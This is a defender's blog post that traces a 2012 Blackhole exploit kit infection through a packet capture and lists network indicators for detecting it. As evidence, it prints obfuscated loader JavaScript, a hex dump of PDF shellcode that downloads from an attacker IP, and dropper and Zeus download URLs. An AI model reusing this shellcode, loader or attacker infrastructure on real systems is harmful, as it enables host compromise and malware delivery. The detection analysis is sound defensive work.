By Grant Warkins Advisory Practice Consultant RSA/NetWitness Incident Response
Based on the last few Incident Response engagements I’ve participated in, the most common question I’ve heard is “what are the common indicators you are using to find evil?” This is not a question that has a simple answer. In this blog post, I’ll examine a Blackhole exploit kit session and discuss the various network indicators that analysts should be looking for when identifying host exploitation and associated binaries. The intent here is not to pick apart malware or de-obfuscate JavaScript, but to show how asking simple questions about your network traffic can reveal the bad stuff being missed by your other security products.
For this exercise, I’m utilizing a packet capture (PCAP) associated with a zero day exploit used by the Blackhole exploit kit 2.0. This PCAP can be found on the Contagio malware repository managed by Mila Parkour[1].
This scenario begins with a phishing email attempting to spoof correspondence with a popular data processing outsourcing provider. A user that clicks on the link with Firefox as the default browser will initiate the following HTTP GET request:
![Figure 1]()
Figure 1: Initial HTTP GET Request
The response is a common indicator of a Blackhole exploit kit landing page, as noted by the text “WAIT PLEASE Loading…”, followed by JavaScript pointing to links associated with active redirectors.
![Figure 2: Example of Blackhole Exploit Kit Landing Page]()
Figure 2: Example of Blackhole Exploit Kit Landing Page
NOTE: Be careful when building IDS rules based on the HTML text above due to the high possibility of false positives. However, note that the folder names in the URL path contain 8 random alphanumeric characters.
![Figure 3: Sample GET Request From Landing Page]()
Figure 3: Sample GET Request From Landing Page
Both URLs point to the same redirector containing the exploits to be served to the host:
![Figure 4: Redirector Points to Host Containing Exploits]()
Figure 4: Redirector Points to Host Containing Exploits
NOTE: The ETag associated with this file was also found in PCAPs associated with other redirectors and could provide a useful indicator to be used in an IDS signature.
As shown in the GET request below, a common red flag for analysts to review is an HTTP GET request directly to an IP address. While there are occasions where this is normal, it’s a good practice to verify that a direct HTTP request to an IP is benign.
![Figure 5: Get Request Sent to Server Containing Exploit Code]()
Figure 5: Get Request Sent to Server Containing Exploit Code
Accessing this page dynamically generates heavily obfuscated JavaScript containing a URL pointing to PDF and Java exploits (Decoding this JavaScript will be discussed in a future blog post).
| HTTP/1.1 200 OKServer: nginx/0.7.67Date: Wed, 19 Sep 2012 02:41:56 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-alive
X-Powered-By: PHP/5.3.14-1~dotdeb.0
Content-Length: 27513<html><body><applet archive=”http://69.194.193.34/data/java.
jar” code=”fbeatbea.fbeatbed”><param value=”N0b0909041f3131343e3c373e2b3c373e083c
***(removed code)***
^44303l3p3h*3r45441c3h&3q3g3b423h_3g3l423h3f@441g201k1k%1k1d23″></u><script>
a=document[g](“google”)[gg](“data”);
a=a.replace(/[^0-9a-z]/g,”");
s=”";
for(i=0;i<a.length;i+=2){
if(020==0×10)s+=String.fromCharCode(parseInt(a.substr(i,2),28));}
try{(alert+”")()}catch(adgsdg){eval(s);}
</script></body></html> |
Figure 6: Sample of Obfuscated JavaScript and Associated Jar File
Two of the links generated point to an unsuccessful PDF exploit for CVE-2010-0188:
- 69.194.193.34/links/systems-links_warns.php?ljpcwedu=0206360203&unnioab=41&phjf=35353306040934370b06&jct=0b0006000200030b07.
- 69.194.193.34/systems-links_warns.php?nfezhok=0906343704&sbipbq=3dzz7ecg=35353306040934370b06&qara=0b0007000400040b07. This appears to be a second attempt due to the first being unsuccessful.
The PDFs contain the following shellcode, which contains the URL for the downloader:
|
Hexadecimal
|
ASCII
|
| 4c 20 60 0f 05 17 80 4a 3c 20 60 0f 0f 63 80 4a
a3 eb 80 4a 30 20 82 4a 6e 2f 80 4a 41 41 41 41
26 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
12 39 80 4a 64 20 60 0f 00 04 00 00 41 41 41 41
41 41 41 41 66 83 e4 fc fc 85 e4 75 34 e9 5f 33
c0 64 8b 40 30 8b 40 0c 8b 70 1c 56 8b 76 08 33
db 66 8b 5e 3c 03 74 33 2c 81 ee 15 10 ff ff b8
8b 40 30 c3 46 39 06 75 fb 87 34 24 85 e4 75 51
e9 eb 4c 51 56 8b 75 3c 8b 74 35 78 03 f5 56 8b
76 20 03 f5 33 c9 49 41 fc ad 03 c5 33 db 0f be
10 38 f2 74 08 c1 cb 0d 03 da 40 eb f1 3b 1f 75
e6 5e 8b 5e 24 03 dd 66 8b 0c 4b 8d 46 ec ff 54
24 0c 8b d8 03 dd 8b 04 8b 03 c5 ab 5e 59 c3 eb
53 ad 8b 68 20 80 7d 0c 33 74 03 96 eb f3 8b 68
08 8b f7 6a 05 59 e8 98 ff ff ff e2 f9 e8 00 00
00 00 58 50 6a 40 68 ff 00 00 00 50 83 c0 19 50
55 8b ec 8b 5e 10 83 c3 05 ff e3 68 6f 6e 00 00
68 75 72 6c 6d 54 ff 16 83 c4 08 8b e8 e8 61 ff
ff ff eb 02 eb 72 81 ec 04 01 00 00 8d 5c 24 0c
c7 04 24 72 65 67 73 c7 44 24 04 76 72 33 32 c7
44 24 08 20 2d 73 20 53 68 f8 00 00 00 ff 56 0c
8b e8 33 c9 51 c7 44 1d 00 77 70 62 74 c7 44 1d
05 2e 64 6c 6c c6 44 1d 09 00 59 8a c1 04 30 88
44 1d 04 41 51 6a 00 6a 00 53 57 6a 00 ff 56 14
85 c0 75 16 6a 00 53 ff 56 04 6a 00 83 eb 0c 53
ff 56 04 83 c3 0c eb 02 eb 13 47 80 3f 00 75 fa
47 80 3f 00 75 c4 6a 00 6a fe ff 56 08 e8 9c fe
ff ff 8e 4e 0e ec 98 fe 8a 0e 89 6f 01 bd 33 ca
8a 5b 1b c6 46 79 36 1a 2f 70 68 74 74 70 3a 2f
2f 36 39 2e 31 39 34 2e 31 39 33 2e 33 34 2f 6c
69 6e 6b 73 2f 73 79 73 74 65 6d 73 2d 6c 69 6e
6b 73 5f 77 61 72 6e 73 2e 70 68 70 3f 75 73 65
6c 72 6a 75 3d 30 32 30 36 33 36 30 32 30 33 26
72 6c 76 62 3d 33 35 33 35 33 33 30 36 30 34 30
39 33 34 33 37 30 62 30 36 26 63 73 79 6d 76 3d
30 33 26 79 68 76 71 74 77 3d 6b 74 6b 76 26 77
63 69 6f 6a 64 73 3d 63 6b 67 61 77 6f 77 00 00 |
L.`….J<.`..c.J
…J0..Jn/.JAAAA
&……………
.9.Jd.`…..AAAA
AAAAf……u4._3
.d.@0.@..p.V.v.3
.f.^<.t3,…….
.@0.F9.u..4$..uQ
..LQV.u<.t5x..V.
v…3.IA….3…
.8.t……@..;.u
.^.^$..f..K.F..T
$………..^Y..
S..h..}.3t…..h
…j.Y……….
..XPj@h….P…P
U…^……hon..
hurlmT……..a.
…..r…….\$.
..$regs.D$.vr32.
D$..-s.Sh…..V.
..3.Q.D..wpbt.D.
..dll.D…Y…0.
D..AQj.j.SWj..V.
..u.j.S.V.j….S
.V……..G.?.u.
G.?.u.j.j..V….
…N…….o..3.
.[..Fy6./phttp:/
/69.194.193.34/l
inks/systems-lin
ks_warns.php?use
lrju=0206360203&
rlvb=35353306040
934370b06&csymv=
03&yhvqtw=ktkv&w
ciojds=ckgawow.. |
Figure 7: Exploit Code From Malicious PDF
The third link accessed is associated with a Java JAR file that contained exploit code for CVE-2012-1723 and CVE-2012-4681 (Additional review of the JAR file will also be covered in a separate blog). The successful exploit causes the host to download the dropper “calc.exe” from 69.194.193.34/links/systems-links_warns.php?tf=0206360203&le=35353306040934370b06&i=02&jy=b&fg=h.
![Figure 8: Get Request for Downloader]()
- Figure 8: Get Request for Downloader
NOTE: Another red flag for network analysis is shown above with the inclusion of Java/1.7.0_06 being referenced in the User-Agent field. Outside of Java updates, it is not normal to see this and the associated sessions should be reviewed.The response contains additional red flags that should be also be considered:
![Figure 9: Response to HTTP GET Request for the Downloader]()
- Figure 9: Response to HTTP GET Request for the Downloader
- Content-Type does not match what was in the Accept field in the GET request.
- Content-Disposition with filename. This forces the save-as feature to download the file with that name and often indicates an automated download.
With the downloader now on the host and executed, we see it check-in:
![grantblog10]()
- Figure 10: Encrypted HTTP POST From Downloader
NOTE: The above HTTP POST contains several red flags:
- The User-Agent string contains Windows 98.
- HTTP POST direct to an IP.
- HTTP POST without an associated referrer field.
- HTTP POST header contains HTTP/1.0. This is not normally seen associated with modern browsers or tools.
![Figure 10: Encrypted HTTP POST From Downloader]()
- Figure 11: Downloader C2 Response
With the check-in complete, it pulls down the Zeus Trojan
![Figure 12: HTTP GET Request for Zeus]()
- Figure 12: HTTP GET Request for Zeus
![Figure 13: Response to HTTP GET Request for Zeus]()
- Figure 13: Response to HTTP GET Request for Zeus
Finally, we see random UDP data being sent to seemingly random IP addresses, which is a good indicator that the Zeus version downloaded was P2P capable, without having to statically analyze it.
| ip.dst = 79.14.79.134ip.proto = 17udp.srcport = 18707udp.dstport = 24815service = 0streams = 1packets = 1
lifetime = 0
country.dst = Italy
city.dst = Verona
latdec.dst = 45.45
longdec.dst = 11
org.dst = Telecom Italia
domain.dst = telecomitalia.it |
Figure 14: Sample Zeus P2P Packet Metadata
So, just from quickly analyzing the Blackhole exploit kit in action, we’ve identified several key network indicators that analysts should keep an eye out for. These indicators can be easily automated by your tool of choice, be it an IDS or a NetWitness Decoder and can be grouped to reduce the amount of false positive hits. Additionally, products such as NetWitness are migrating to a unified analytics approach, which are automating the implementation of well-known indicators as they become known within the malware intelligence community. The table below summarizes the network indicators we’ve identified:
![Figure 15: Sample P2P Data Sent By Zeus]()
- Figure 15: Sample P2P Data Sent By Zeus
| Network Indicator |
False Positive Rate |
| HTTP GET requests with folder names containing 8 random alpha numeric characters |
High False Positive Rate |
HTTP Response containing “<h1>WAIT PLEASE</h1>
<h3>Loading...</h3>”
|
High False Positive Rate |
| Signature based on a specific HTTP ETag |
Low False Positive Rate |
| HTTP GET or POST direct to an IP |
Moderate False Positive Rate |
| client contains java && (filetype = 'windows executable') |
Low False Positive Rate |
| HTTP Content-Disposition with Filename |
Moderate False Positive Rate |
| User-Agent containing deprecated Operating Systems or browsers |
Low False Positive Rate |
| HTTP POST or GET without a referrer field |
Low False Positive Rate |
| HTTP Post referencing HTTP/1.0 |
Moderate False Positive Rate |
Figure 16: Summary of Common Network Indicators
[1] http://contagiodump.blogspot.com/2012/09/cve-2012-4681-samples-original-apt-and.html
